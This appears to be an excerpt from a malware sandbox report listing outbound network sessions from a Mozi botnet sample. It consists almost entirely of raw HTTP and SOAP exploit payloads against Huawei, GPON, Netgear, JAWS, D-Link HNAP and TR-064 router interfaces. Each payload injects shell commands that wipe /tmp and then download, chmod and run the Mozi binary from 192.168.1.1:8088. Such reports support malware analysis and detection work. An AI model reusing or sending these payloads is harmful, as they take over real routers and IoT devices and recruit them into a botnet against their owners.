                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        19192.168.2.2353158143.151.72.2837215
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578743935 CET821OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                        Host: 143.151.72.28:37215
                                                                        Content-Length: 601
                                                                        Connection: keep-alive
                                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        20192.168.2.234727898.35.241.7852869
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578773022 CET886OUTPOST /picsdesc.xml HTTP/1.1
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: /
                                                                        User-Agent: Hello-World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        21192.168.2.233937080.180.109.8680
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578804016 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:80
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        22192.168.2.235059865.224.103.4981
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578824043 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        23192.168.2.2355266144.94.116.22480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578852892 CET281OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                        User-Agent: Hello, world
                                                                        Host: 144.94.116.224:80
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                        Connection: keep-alive


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        24192.168.2.2352542146.136.103.16349152
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578892946 CET933OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                        Host: 146.136.103.163:49152
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        25192.168.2.235587229.21.212.181
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578916073 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        26192.168.2.2346736104.212.159.1348080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578936100 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        27192.168.2.2344516129.222.135.498080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578983068 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        28192.168.2.234520463.218.221.15049152
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579018116 CET932OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                        Host: 63.218.221.150:49152
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        29192.168.2.2347792152.156.223.1708080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579045057 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:8080
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        30192.168.2.234933228.64.132.14581
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579066038 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        31192.168.2.2354214174.112.238.1508080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579094887 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:8080
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        32192.168.2.233813848.209.236.16480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579123974 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        33192.168.2.2337480122.219.76.17281
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579139948 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        34192.168.2.2350372100.40.238.1587574
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579174995 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:7574
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        35192.168.2.234671023.157.2.21480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579220057 CET801OUTPOST /HNAP1/ HTTP/1.0
                                                                        Host: 23.157.2.214:80
                                                                        Content-Type: text/xml; charset="utf-8"
                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        36192.168.2.2335422142.225.53.12980
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579243898 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:80
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        37192.168.2.235884273.149.43.25380
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579272032 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        38192.168.2.234525243.10.138.1868080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579294920 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        39192.168.2.235728875.246.37.12380
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579336882 CET802OUTPOST /HNAP1/ HTTP/1.0
                                                                        Host: 75.246.37.123:80
                                                                        Content-Type: text/xml; charset="utf-8"
                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
